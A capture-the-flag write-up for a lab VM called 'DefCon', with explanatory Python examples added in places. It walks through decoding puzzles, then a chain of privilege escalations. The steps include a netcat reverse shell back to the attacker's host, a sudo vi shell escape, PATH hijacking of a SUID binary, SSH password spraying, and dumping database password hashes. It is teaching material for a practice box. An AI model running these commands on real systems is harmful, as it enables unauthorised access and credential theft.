DefCon

Introduction
After a first challenge, which can be found on tryhackme.com, this is my second challenge, dubbed “DefCon”.
The challenge walks through some basic skills and covers typical CTF-like techniques.
I will post parts of the solution so people who are stuck can move forward after a while, without spoiling everything.
[UPDATE]: Because of the whole Covid-19 thing and the world going into lock-down, I completely forgot I haven’t finished this write-up and got stuck at user Smith. This update is the last one as it will be the last piece to escalate to root.
Recon
First finding open ports and running services:
PORT    STATE  SERVICE  VERSION
22/tcp  open   ssh?
80/tcp  open   http     Apache httpd 2.4.25
222/tcp closed rsh-spx
443/tcp open   ssl/http Apache httpd 2.4.25 ((Debian))
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port22-TCP:V=7.70%I=7%D=6/10%Time=5CFE6D96%P=x86_64-pc-linux-gnu%r(Gene
SF:ricLines,8,"8\[Vuu2\r\n");
MAC Address: 00:0C:29:08:EA:C8 (VMware)
Service Info: Host: nsa-server
Web-server
When pointing the browser at 192.168.2.23 there is an error, "Server not found", and the URL in the address bar has changed to a host name.
The browser doesn't know where to go, because there is no DNS entry for that name. To solve this, add an entry to the /etc/hosts file:
192.168.2.23 nsa-server.net
Now the browser knows where to go.
Because the SSL certificate is self-signed, there is a warning.
After accepting the risk, the website is shown.
On this page there are 3 crypto puzzles.
Puzzle 1
dr0 cy berws sthre atapd phi shin g00ghac kergnka liikama lware erfhtim stnegar ans omwarefo drows sapeh tv iruss isiht
Puzzle 2
TTSFM34YHHWGGSRSIEOR0SEMSPRA0YV4IADHDO3RSSOANUR7
Puzzle 3
turret much eagle jazzers slow fish sleep sense red perv ending spider ice atlas flood zebra kilo phone
SSL
When checking the SSL certificate, there is an e-mail address in it with a different domain name.
This indicates that there are probably several virtual hosts active on the remote web server.
To browse the other domain name, we adjust the /etc/hosts file again.
By altering the line: 192.168.2.23 nsa-server.net nsa-secretserver.net, the browser can be directed to the other domain.
There is a terminal on the main page that reports the status of the system.
After waiting long enough, it looks like something is wrong with the system, and at the end some code is being exfiltrated.
-/…./.\.--/---/.-./-../.--./.-././…/…\.--./.-/…/…/.--/---/.-./-..\---/..-.\.---/---/…./-.\../…\…/-/.----/.-../.-../…--/.-/…/-.--/-.-.--/-.-.--/-.-.--
The sequence is Morse code. The forward slash is functioning as letter delimiter and the backslash as word delimiter.
The website https://gchq.github.io/CyberChef/ can help with the deciphering.
TE WORDPRE PAWORD OF JON I T1LLAY!!!
There is a problem with the result: it is missing letters.
Taking another look at the page source reveals the cause: every run of three dots was placed in the HTML as the entity &#8230; (a single ellipsis character), so the copied Morse has one character where three dots should be.
To solve this, a side step is needed: replace the entity with three literal dots.
root@redteam:~/DefCon/morse# echo "-/…./.\.--/---/.-./-../.--./.-././…/…\.--./.-/…/…/.--/---/.-./-..\---/..-.\.---/---/…./-.\../…\…/-/.----/.-../.-../…--/.-/…/-.--/-.-.--/-.-.--/-.-.--" > string.txt
root@redteam:~/DefCon/morse# sed -i 's/\&\#8230\;/.../g' string.txt
root@redteam:~/DefCon/morse# cat string.txt
-/..../.\.--/---/.-./-../.--./.-././.../...\.--./.-/.../.../.--/---/.-./-..\---/..-.\.---/---/..../-.\../...\.../-/.----/.-../.-../...--/.-/.../-.--/-.-.--/-.-.--/-.-.--
After another try with the corrected string the result on cyberchef is better.
THE WORDPRESS PASSWORD OF JOHN IS [SPOILER]
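As an added example (not part of the original write-up), the same decoding done in Python, with the HTML-entity repair that the sed step performs built in. The Morse table and the '/' letter and '\' word delimiters follow the write-up; the sample string is the page's own Morse up to the word IS, so the spoilered part is not decoded here. Decoding the unrepaired string reproduces the dropped letters seen in the first CyberChef attempt.

```python
"""Decode the exfiltrated Morse string from the challenge page.

Added example, not from the original write-up. The '/' letter delimiter and
'\\' word delimiter are the ones the write-up describes; the entity repair
mirrors the author's sed step (&#8230; -> ...).
"""
import html

# International Morse code: letters, digits and the punctuation the puzzle uses.
MORSE = {
    ".-": "A", "-...": "B", "-.-.": "C", "-..": "D", ".": "E", "..-.": "F",
    "--.": "G", "....": "H", "..": "I", ".---": "J", "-.-": "K", ".-..": "L",
    "--": "M", "-.": "N", "---": "O", ".--.": "P", "--.-": "Q", ".-.": "R",
    "...": "S", "-": "T", "..-": "U", "...-": "V", ".--": "W", "-..-": "X",
    "-.--": "Y", "--..": "Z",
    "-----": "0", ".----": "1", "..---": "2", "...--": "3", "....-": "4",
    ".....": "5", "-....": "6", "--...": "7", "---..": "8", "----.": "9",
    "-.-.--": "!", ".-.-.-": ".", "--..--": ",", "..--..": "?",
}


def repair_entities(raw: str) -> str:
    """Undo the web page's mangling of '...' into an ellipsis.

    The page source carries three dots as the HTML entity &#8230; (U+2026
    HORIZONTAL ELLIPSIS). A copy-paste yields either the entity text or the
    single character; both must become three literal dots again.
    """
    return html.unescape(raw).replace("\u2026", "...")


def decode_morse(raw: str, repair: bool = True,
                 letter_sep: str = "/", word_sep: str = "\\") -> str:
    """Decode Morse text; unknown symbols become '?' so gaps are visible, not silent."""
    text = repair_entities(raw) if repair else raw
    words = []
    for word in text.split(word_sep):
        letters = [MORSE.get(sym, "?") for sym in word.split(letter_sep) if sym]
        words.append("".join(letters))
    return " ".join(words)


# The page's Morse up to the word IS, copied with the mangled ellipsis exactly
# as the page shows it (constructed test input for this example).
SAMPLE = ("-/…./.\\.--/---/.-./-../.--./.-././…/…\\.--./.-/…/…/.--/---/.-./-.."
          "\\---/..-.\\.---/---/…./-.\\../…")

if __name__ == "__main__":
    print(decode_morse(SAMPLE, repair=False))  # letters lost, as in the first attempt
    print(decode_morse(SAMPLE))                # THE WORDPRESS PASSWORD OF JOHN IS
```

Mapping unknown symbols to '?' instead of dropping them is deliberate: the first CyberChef result silently lost letters, which is what made the problem hard to spot.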
WordPress – Graham
The WordPress dashboard holds a menu called plugins. Here there is a plugin called WPTerm, which offers a terminal for the system.
EoP1 – Graham > John
In the /home/graham folder there is some mail.
graham:/home/graham $ cat mbox
From john@nsa-server Mon Jun 10 11:35:48 2019
Return-path: <john@nsa-server>
Envelope-to: graham@nsa-server
Delivery-date: Mon, 10 Jun 2019 11:35:48 +0200
Received: from john by nsa-server with local (Exim 4.89)
	(envelope-from <john@nsa-server>)
	id 1haGiS-0004Sh-6R
	for graham@nsa-server; Mon, 10 Jun 2019 11:35:48 +0200
To: <graham@nsa-server>
Subject: password problems
X-Mailer: mail (GNU Mailutils 3.1.1)
Message-Id: <E1haGiS-0004Sh-6R@nsa-server>
From: john@nsa-server
Date: Mon, 10 Jun 2019 11:35:48 +0200

Hi Graham,

Sorry man to bother you, but I forgot my password. I don't want to go to Smith because he will rip me a new hole.
Can you please help me?

Thanks man!!!

John
In the Trash folder there is a deleted note.
graham:/home/graham/.local/share/Trash/files $ cat note.txt
Hi John,

After your latest password failure I changed it. You know where it is right? Wink Wink!
Pretty easy right? Try not to forget this one also. You know how the boss is like! You wanna get fired or something?
Also smart idea to sent this message with netcat right? I don't trust our mailsystem.
After sending this message, I'll trow it away....no one will know. hahahaha......now who is a cybernoob!!!!

Best,
Graham

P.S. You Do kNow whEre The paSswoRd Is hiDden rigHt?
The new password of John is hidden inside this message in plain sight.
The last line has some uppercase letters; separating them from the rest of the string yields the password.
root@redteam:~/DefCon/john# echo "You Do kNow whEre The paSswoRd Is hiDden rigHt?" > pass.enc
root@redteam:~/DefCon/john# cat pass.enc | sed 's/[a-z]//g' | sed 's/ //g' | sed 's/\?//g' > pass.dec
root@redteam:~/DefCon/john# cat pass.dec
[SPOILER]
With the username and password, switching to john with su would be the next step.
graham:/home/graham/.local/share/Trash/files $ su john
su: must be run from a terminal
That is not going to work from the WPTerm shell, as it has no TTY. Normally this would be a good time to SSH into the system as John.
But the SSH service on port 22 is a honeypot, so that would be a waste of time.
Instead, a reverse shell upgraded to a proper TTY is the better route.
First start a listener on your machine with netcat:
root@kali:~# nc -lvnp 1337
listening on [any] 1337 ...
Then connect from the remote machine to your machine with netcat.
graham:/home/graham/.local/share/Trash/files $ nc 10.10.10.128 1337 -e /bin/sh
Now the connection is established and there is a reverse shell running.
connect to [10.10.10.128] from (UNKNOWN) [10.10.10.129] 43696
id
uid=1002(graham) gid=1002(graham) groups=1002(graham),8(mail)
Now to get a proper TTY.
python -c 'import pty;pty.spawn("/bin/bash");'
graham@nsa-server:/home/graham/.local/share/Trash/files$
After this, switch to user John.
graham@nsa-server:/home/graham/.local/share/Trash/files$ su john
Password:
john@nsa-server:/home/graham/.local/share/Trash/files$ id
uid=1003(john) gid=1003(john) groups=1003(john),8(mail)
EoP 2 – John > George
First see what this user can do.
john@nsa-server:~$ sudo -l
sudo -l
[sudo] password for john: YDNETSRIDH
Matching Defaults entries for john on nsa-server:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User john may run the following commands on nsa-server:
    (ALL) PASSWD: /bin/systemctl start ssh, /bin/systemctl stop ssh, /bin/systemctl status ssh
It looks like user john can start a proper ssh server.
john@nsa-server:~$ sudo /bin/systemctl start ssh
But port 22 was already taken by the honeypot, so let's check which port the real SSH server uses.
john@nsa-server:~$ ss -tan
ss -tan
State   Recv-Q Send-Q Local Address:Port                     Peer Address:Port
LISTEN  0      80     127.0.0.1:3306                        *:*
LISTEN  0      128    *:80                                  *:*
LISTEN  0      5      10.14.185.1:53                        *:*
LISTEN  0      128    *:22                                  *:*
LISTEN  0      20     127.0.0.1:25                          *:*
LISTEN  0      128    *:443                                 *:*
LISTEN  0      128    *:222                                 *:*
ESTAB   0      0      192.168.20.130:443                    192.168.20.131:44098
ESTAB   0      91     192.168.20.130:50678                  192.168.20.131:9999
LISTEN  0      5      fe80::cc1a:73ff:fe37:ea85%lxdbr0:53   :::*
LISTEN  0      2      ::1:3350                              :::*
LISTEN  0      20     ::1:25                                :::*
LISTEN  0      2      :::3389                               :::*
LISTEN  0      128    :::222                                :::*
Looks like port 222 is listening for a connection.
n0w4n@lab:~/DefCon$ ssh john@nsa-server.net -p 222
The authenticity of host '[nsa-server.net]:222 ([192.168.20.130]:222)' can't be established.
ECDSA key fingerprint is SHA256:sRxKXwYbv1ua3s7dbnPyX0hmggOGZ6IX3eDflEQ66Bo.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[nsa-server.net]:222,[192.168.20.130]:222' (ECDSA) to the list of known hosts.
john@nsa-server.net's password:
Linux nsa-server 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u2 (2019-05-13) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
No mail.
Last login: Fri Apr 10 14:03:51 2020 from 10.10.10.130
john@nsa-server:~$
There is a file in the Documents folder.
john@nsa-server:~/Documents$ ls -lah
ls -lah
total 20K
drwxr-x---  2 john john 4.0K Apr 10 14:42 .
drwxr-x--- 16 john john 4.0K Apr 22 10:23 ..
-rw-r--r--  1 john john  11K Apr 10 14:42 secret.png
john@nsa-server:~/Documents$ file secret.png
file secret.png
secret.png: PDF document, version \012.\012
Judging by the extension, it looks like a picture.
But when checking the file type, Linux says it's a PDF.
To get a better look at the file, we transfer it to the local machine.
n0w4n@lab:~/DefCon$ scp -P 222 john@nsa-server.net:/home/john/Documents/secret.png .
john@nsa-server.net's password:
secret.png
When we try to open the file as a picture, there is nothing to show.
Let's copy the file and rename it to .pdf.
Also nothing.
When looking at the file in a hex editor, the important part to check is the header: the magic bytes at the very start of the file.
There are several lists of file signatures (magic bytes) available online.
Comparing our file to the PDF signature, the beginning matches.
But the file wasn't named .pdf.
It was .png.
As we can see, the first 5 bytes are those of a PDF header (%PDF-).
But looking a bit further, the 6th, 7th and 8th bytes match the tail of the PNG signature.
Let's overwrite the header to match the PNG file signature.
In the ASCII column of the hex editor we can now see that the header is the PNG one.
n0w4n@lab:~/DefCon$ file secret.png
secret.png: PNG image data, 886 x 669, 8-bit/color RGB, non-interlaced
The file is now readable as a picture and when opening it, there is a string.
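As an added example (not from the write-up), the header check done programmatically: identify the type from the magic bytes, recognise a PNG whose first bytes were overwritten by a PDF header, restore the PNG signature and read the dimensions from the IHDR chunk. The sample bytes are constructed here; only the 886 x 669 size is taken from the page's `file` output.

```python
"""Identify a file by its magic bytes and repair a PNG whose leading bytes were
overwritten with a PDF header, as happened to secret.png in the write-up.

Added example, not from the original write-up. The sample bytes are constructed
here; the 886 x 669 dimensions come from the page's `file` output.
"""
import struct
import zlib
from typing import Tuple

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"   # 8 bytes
PDF_SIGNATURE = b"%PDF-"               # 5 bytes


def identify(data: bytes) -> str:
    """Return a type name from the leading bytes, the way `file` does (subset)."""
    if data.startswith(PNG_SIGNATURE):
        return "png"
    if data.startswith(PDF_SIGNATURE):
        return "pdf"
    return "unknown"


def looks_like_damaged_png(data: bytes) -> bool:
    """A 5-byte overwrite of the PNG signature leaves LF SUB LF at offsets 5..7
    (the 6th to 8th bytes the write-up noticed) and the IHDR tag at offset 12."""
    return (len(data) > 16
            and data[5:8] == PNG_SIGNATURE[5:8]
            and data[12:16] == b"IHDR")


def repair_png_signature(data: bytes) -> bytes:
    """Restore the 8-byte PNG signature; everything after it is left untouched."""
    if not looks_like_damaged_png(data):
        raise ValueError("data does not look like a PNG with a clobbered signature")
    return PNG_SIGNATURE + data[8:]


def png_dimensions(data: bytes) -> Tuple[int, int]:
    """Parse width/height from IHDR, verifying the chunk CRC before trusting them."""
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG")
    length, ctype = struct.unpack(">I4s", data[8:16])
    if ctype != b"IHDR" or length != 13:
        raise ValueError("first chunk is not a valid IHDR")
    body = data[16:16 + length]
    (crc,) = struct.unpack(">I", data[16 + length:20 + length])
    if zlib.crc32(ctype + body) & 0xFFFFFFFF != crc:
        raise ValueError("IHDR CRC mismatch")
    width, height = struct.unpack(">II", body[:8])
    return width, height


def build_sample_png(width: int, height: int) -> bytes:
    """Construct a minimal PNG (signature + IHDR) for the demonstration."""
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)  # 8-bit RGB
    chunk = struct.pack(">I", len(ihdr)) + b"IHDR" + ihdr
    chunk += struct.pack(">I", zlib.crc32(b"IHDR" + ihdr) & 0xFFFFFFFF)
    return PNG_SIGNATURE + chunk


# Constructed stand-in for secret.png: the first five bytes replaced by "%PDF-",
# the remaining three signature bytes and the IHDR chunk left intact.
DAMAGED = PDF_SIGNATURE + build_sample_png(886, 669)[5:]

if __name__ == "__main__":
    print(identify(DAMAGED))                       # pdf, like the box's `file`
    fixed = repair_png_signature(DAMAGED)
    print(identify(fixed), png_dimensions(fixed))  # png (886, 669)
```

Checking the IHDR CRC before reporting dimensions is the part worth copying into real tooling: a file whose signature has been tampered with may have had more than its first bytes changed.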
A password maybe? But for who?
n0w4n@lab:~/DefCon$ cat names.list
george
graham
nicky
samantha
smith
To find which user the found password belongs to, there are several ways to go about it.
In this write-up we look at three options.
First option: because it is a small list of names, we can do it by hand or with a small bash one-liner.
n0w4n@lab:~/DefCon$ for i in $(cat names.list); do ssh -l "${i}" nsa-server.net -p 222; done
george@nsa-server.net's password:
Linux nsa-server 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u2 (2019-05-13) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Apr 10 14:45:30 2020 from 10.10.10.130
george@nsa-server:~$
Pretty simple, but with a very long list of names it becomes an annoying task, as every attempt asks for the password.
The second option is to use a tool called sshpass, which supplies the password non-interactively.
n0w4n@lab:~/DefCon$ for i in $(cat names.list); do sshpass -p "2W3dsF5tGh-Kl#1" ssh -o StrictHostKeyChecking=no "${i}"@nsa-server.net -p 222; done
Linux nsa-server 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u2 (2019-05-13) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Apr 22 13:40:32 2020 from 192.168.20.131
george@nsa-server:~$
This option was quite a bit faster and didn't need any manual input for the password.
The final option is to use Metasploit:
msf5 > use auxiliary/scanner/ssh/ssh_login
msf5 auxiliary(scanner/ssh/ssh_login) > options

Module options (auxiliary/scanner/ssh/ssh_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   RHOSTS                             yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT             22               yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads (max one per host)
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           false            yes       Whether to print output for all attempts

msf5 auxiliary(scanner/ssh/ssh_login) > set PASSWORD 2W3dsF5tGh-Kl#1
PASSWORD => 2W3dsF5tGh-Kl#1
msf5 auxiliary(scanner/ssh/ssh_login) > set USER_FILE names.list
USER_FILE => names.list
msf5 auxiliary(scanner/ssh/ssh_login) > set RHOSTS nsa-server.net
RHOSTS => nsa-server.net
msf5 auxiliary(scanner/ssh/ssh_login) > set VERBOSE true
VERBOSE => true
msf5 auxiliary(scanner/ssh/ssh_login) > set RPORT 222
RPORT => 222
msf5 auxiliary(scanner/ssh/ssh_login) > run

[+] 192.168.20.130:222 - Success: 'george:2W3dsF5tGh-Kl#1' ''
[!] No active DB -- Credential data will not be saved!
[*] Command shell session 1 opened (192.168.20.131:38663 -> 192.168.20.130:222) at 2020-04-22 13:53:41 +0200
[-] 192.168.20.130:222 - Failed: 'graham:2W3dsF5tGh-Kl#1'
[-] 192.168.20.130:222 - Failed: 'nicky:2W3dsF5tGh-Kl#1'
[-] 192.168.20.130:222 - Failed: 'samantha:2W3dsF5tGh-Kl#1'
[-] 192.168.20.130:222 - Failed: 'smith:2W3dsF5tGh-Kl#1'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
This option is also fast with a very long list of usernames.
It is equally fast when you also have a list of passwords to test against the users.
EoP 3 – George > Samantha
The recon starts over every time we log in as a different user.
In this case user george also has some sudo rights on this system.
george@nsa-server:~$ sudo -l
[sudo] password for george:
Matching Defaults entries for george on nsa-server:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User george may run the following commands on nsa-server:
    (samantha) /usr/bin/vi
This user can run the Vi editor with the rights of user Samantha.
We can abuse this, but Vi has to be started as user Samantha.
george@nsa-server:~$ sudo -u samantha vi test
Inside the Vi editor there is an option to run a shell command, which gives us a shell as samantha:
$ id
uid=1006(samantha) gid=1006(samantha) groups=1006(samantha)
Use Python again to get a proper TTY.
$ python -c 'import pty;pty.spawn("/bin/bash");'
samantha@nsa-server:/home/george$
EoP 4 – Samantha > Nicky
Back in the home folder of this user, there is something of interest.
samantha@nsa-server:~$ ls -lah
total 72K
drwxr-x--- 10 samantha samantha 4.0K Apr 10 19:49 .
drwxr-xr-x  8 root     root     4.0K Apr 10 14:40 ..
-rw-------  1 samantha samantha    1 Apr 11 17:55 .bash_history
-rw-r--r--  1 samantha samantha  220 May 15  2017 .bash_logout
-rw-r--r--  1 samantha samantha 3.5K May 15  2017 .bashrc
-rwsr-xr-x  1 root     root     8.6K Apr 10 16:17 check
drwxr-xr-x  2 samantha samantha 4.0K May 10  2019 Desktop
drwxr-xr-x  2 samantha samantha 4.0K May 10  2019 Documents
drwxr-xr-x  2 samantha samantha 4.0K May 10  2019 Downloads
drwxr-xr-x  2 samantha samantha 4.0K May 10  2019 Music
drwxr-xr-x  2 samantha samantha 4.0K May 10  2019 Pictures
-rw-r--r--  1 samantha samantha  675 May 15  2017 .profile
drwxr-xr-x  2 samantha samantha 4.0K May 10  2019 Public
drwxr-xr-x  2 samantha samantha 4.0K May 10  2019 Templates
drwxr-xr-x  2 samantha samantha 4.0K May 10  2019 Videos
-rw-------  1 samantha samantha 2.1K Apr 10 19:49 .viminfo
There is an executable with the SUID flag enabled.
Let’s see what the program does.
samantha@nsa-server:~$ ./check
[-] These are all the connections at the moment:
Netid State  Recv-Q Send-Q Local Address:Port                    Peer Address:Port
udp   UNCONN 0      0      *:1900                               *:*
udp   UNCONN 0      0      10.14.185.1:53                       *:*
udp   UNCONN 0      0      *:58430                              *:*
udp   UNCONN 0      0      *%lxdbr0:67                          *:*
udp   UNCONN 0      0      *:5353                               *:*
udp   UNCONN 0      0      fe80::cc1a:73ff:fe37:ea85%lxdbr0:53  :::*
udp   UNCONN 0      0      :::58540                             :::*
udp   UNCONN 0      0      :::5353                              :::*
tcp   LISTEN 0      80     127.0.0.1:3306                       *:*
tcp   LISTEN 0      128    *:80                                 *:*
tcp   LISTEN 0      5      10.14.185.1:53                       *:*
tcp   LISTEN 0      128    *:22                                 *:*
tcp   LISTEN 0      20     127.0.0.1:25                         *:*
tcp   LISTEN 0      128    *:443                                *:*
tcp   LISTEN 0      128    *:222                                *:*
tcp   ESTAB  0      0      192.168.20.130:222                   192.168.20.131:48834
tcp   LISTEN 0      5      fe80::cc1a:73ff:fe37:ea85%lxdbr0:53  :::*
tcp   LISTEN 0      2      ::1:3350                             :::*
tcp   LISTEN 0      20     ::1:25                               :::*
tcp   LISTEN 0      2      :::3389                              :::*
tcp   LISTEN 0      128    :::222                               :::*
It runs the ss command and shows a list of the current connections.
If the program calls ss by a relative name (just ss, resolved through PATH) instead of an absolute path, we can manipulate PATH and trick the program into running something of our choosing.
To do this, we first create our own version of ss.
samantha@nsa-server:~$ echo "/bin/bash" > /tmp/ss
Then we make the file executable.
samantha@nsa-server:~$ chmod +x /tmp/ss
Because we want the program to execute our ss file instead of the correct one, we alter the PATH variable.
samantha@nsa-server:~$ export PATH=/tmp:$PATH
This way, whenever the system looks for a program it walks the directories in the PATH variable in order.
Normally it starts in /usr/local/bin, then goes to /usr/bin, and keeps going until it finds the program.
If nothing is found, you get an error that the program can't be found.
When executing the check program, the system walks the PATH variable again, but now it starts in /tmp.
It finds our ss executable, takes it for the real one and runs it.
samantha@nsa-server:~$ ./check
[-] These are all the connections at the moment:
nicky@nsa-server:~$ id
uid=1007(nicky) gid=1007(nicky) groups=1007(nicky),1006(samantha)
Running the program executed our version of ss and elevated our rights to... nicky (not root, bummer).
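Added example (not code from the write-up) that models the PATH lookup the text describes and the check a privileged helper should make before trusting a search directory. The secure_path string is the one sudo reported on the box; the trust rule (root-owned, not group- or world-writable) is the usual one and is this example's assumption; the scratch directories and the fake ss are constructed.

```python
"""How PATH lookup lets /tmp/ss shadow the real ss, and the directory check a
hardened SUID helper should make (or avoid the lookup entirely by hard-coding
an absolute path and a fixed PATH, as sudo's secure_path does).

Added example, not code from the write-up. Trust rule (root-owned, not
group/world-writable) is this example's assumption; scratch dirs are constructed.
"""
import os
import stat
import tempfile
from typing import Dict, List, Optional

# The search list sudo enforces on the box (taken from its `sudo -l` output).
SECURE_PATH = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"


def resolve(command: str, path: str) -> Optional[str]:
    """First executable named `command` along `path`, in order: what a shell or
    system("ss") does. The leftmost directory wins, which is the whole trick."""
    for directory in path.split(os.pathsep):
        candidate = os.path.join(directory, command)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate
    return None


def is_trusted_dir(owner_uid: int, mode: int) -> bool:
    """A directory is safe to execute from only if root owns it and nobody but
    root can write to it. /tmp (root, 1777) fails; /usr/bin (root, 0755) passes."""
    return owner_uid == 0 and not (mode & (stat.S_IWGRP | stat.S_IWOTH))


def untrusted_entries(path: str) -> List[str]:
    """Entries of `path` a privileged program must not search."""
    bad = []
    for directory in path.split(os.pathsep):
        try:
            st = os.stat(directory)
        except FileNotFoundError:
            bad.append(directory)  # a missing entry could be created by anyone later
            continue
        if not is_trusted_dir(st.st_uid, stat.S_IMODE(st.st_mode)):
            bad.append(directory)
    return bad


def demo() -> Dict[str, bool]:
    """Reproduce the write-up's scenario in a scratch directory: a fake `ss` in a
    user-writable dir that is prepended to PATH shadows the one in the 'real' dir."""
    with tempfile.TemporaryDirectory() as scratch:
        hijack_dir = os.path.join(scratch, "tmp")   # stands in for /tmp
        real_dir = os.path.join(scratch, "bin")     # stands in for /bin
        os.makedirs(hijack_dir)
        os.makedirs(real_dir)
        for d in (hijack_dir, real_dir):
            script = os.path.join(d, "ss")
            with open(script, "w") as fh:
                fh.write("#!/bin/sh\necho %s\n" % d)
            os.chmod(script, 0o755)
        attacker_path = os.pathsep.join([hijack_dir, real_dir])
        return {
            # export PATH=/tmp:$PATH makes the fake win...
            "hijacked": resolve("ss", attacker_path) == os.path.join(hijack_dir, "ss"),
            # ...while a fixed search list that excludes it finds the real one.
            "fixed_path": resolve("ss", real_dir) == os.path.join(real_dir, "ss"),
            "tmp_trusted": is_trusted_dir(0, 0o1777),
            "usr_bin_trusted": is_trusted_dir(0, 0o755),
        }


if __name__ == "__main__":
    print(demo())
    print("untrusted in secure_path:", untrusted_entries(SECURE_PATH))
```

The lesson for the author of a program like check is that the environment it inherits is attacker-controlled; it should exec /bin/ss by absolute path and reset PATH to a fixed value, which is exactly what the secure_path setting does for sudo.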
EoP 5 – Nicky > Smith
When looking at the connections earlier, there was another one of interest.
There is a MariaDB instance running locally.
As it seems, user nicky has access to it.
To log in to MariaDB you need a password.
Lucky for you, user Nicky stores hers in a hidden file.
nicky@nsa-server:~/Documents$ ls -lah
total 12K
drwxr-xr-x  2 nicky nicky 4.0K Apr 22 14:54 .
drwxr-x--- 10 nicky nicky 4.0K Apr 10 17:01 ..
-rw-r--r--  1 nicky nicky   14 Apr 22 14:54 .passwd
nicky@nsa-server:~/Documents$ cat .passwd
We_iuh#-qaSW1
As the connection list showed, the MySQL server only listens on the local address, so we connect from the box itself.
nicky@nsa-server:/home/nicky/Documents$ mysql -u nicky -p
Enter password:
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 22
Server version: 10.1.38-MariaDB-0+deb9u1 Debian 9.8

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]>
List all databases.
MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| wordpress          |
+--------------------+
4 rows in set (0.02 sec)
Select the database to use.
MariaDB [wordpress]> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
Show all tables.
MariaDB [mysql]> show tables;
+---------------------------+
| Tables_in_mysql           |
+---------------------------+
| column_stats              |
| columns_priv              |
| db                        |
| event                     |
| func                      |
| general_log               |
| gtid_slave_pos            |
| help_category             |
| help_keyword              |
| help_relation             |
| help_topic                |
| host                      |
| index_stats               |
| innodb_index_stats        |
| innodb_table_stats        |
| plugin                    |
| proc                      |
| procs_priv                |
| proxies_priv              |
| roles_mapping             |
| servers                   |
| slow_log                  |
| table_stats               |
| tables_priv               |
| time_zone                 |
| time_zone_leap_second     |
| time_zone_name            |
| time_zone_transition      |
| time_zone_transition_type |
| user                      |
+---------------------------+
30 rows in set (0.00 sec)
Select the desired columns to show.
MariaDB [mysql]> select user,password from user;
+---------+-------------------------------------------+
| user    | password                                  |
+---------+-------------------------------------------+
| root    |                                           |
| admin   | *6B6D111D0EC8D42C2955E082DD087C3E56B17F98 |
| wpadmin | *5EF818CD1907F11532AD4EB544573261C73F7F2E |
| smith   | *BE84A0E22A8E3E1EAA0883956B3F8692DFE4CA13 |
| nicky   | *75961C95665DC2BAC3F947AF4C60FD73564BCFE2 |
+---------+-------------------------------------------+
5 rows in set (0.00 sec)

MariaDB [mysql]>
Crack it with hashcat, or just run a Google search for a site that lists known hashes.
One of the hashes is a known one: the password hash of user smith.
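As an added example, not from the write-up: the `*`-prefixed 40-hex-digit hashes in the dump are MySQL's mysql_native_password format, an unsalted SHA1(SHA1(password)), which is why a lookup site can recognise one. The check below is the audit you would run against your own user table for weak passwords; the users and wordlist are constructed here and the box's real hashes are not used.

```python
"""Audit MariaDB/MySQL mysql_native_password hashes against a wordlist.

Added example, not from the write-up. The algorithm is MySQL's documented
PASSWORD() for 4.1+: '*' + uppercase hex of SHA1(SHA1(password)). The sample
users and wordlist are constructed here.
"""
import hashlib
from typing import Dict, List


def mysql_native_password(password: str) -> str:
    """Return the hash MySQL stores for `password` (unsalted, so equal passwords
    always give equal hashes; that is what makes lookup tables work)."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def find_weak(user_hashes: Dict[str, str], wordlist: List[str]) -> Dict[str, str]:
    """Map user -> recovered password for every hash matching a wordlist entry.
    An empty hash (no password set, like 'root' in the dump) is reported as ''."""
    # Because there is no salt, each candidate is hashed once, not once per user.
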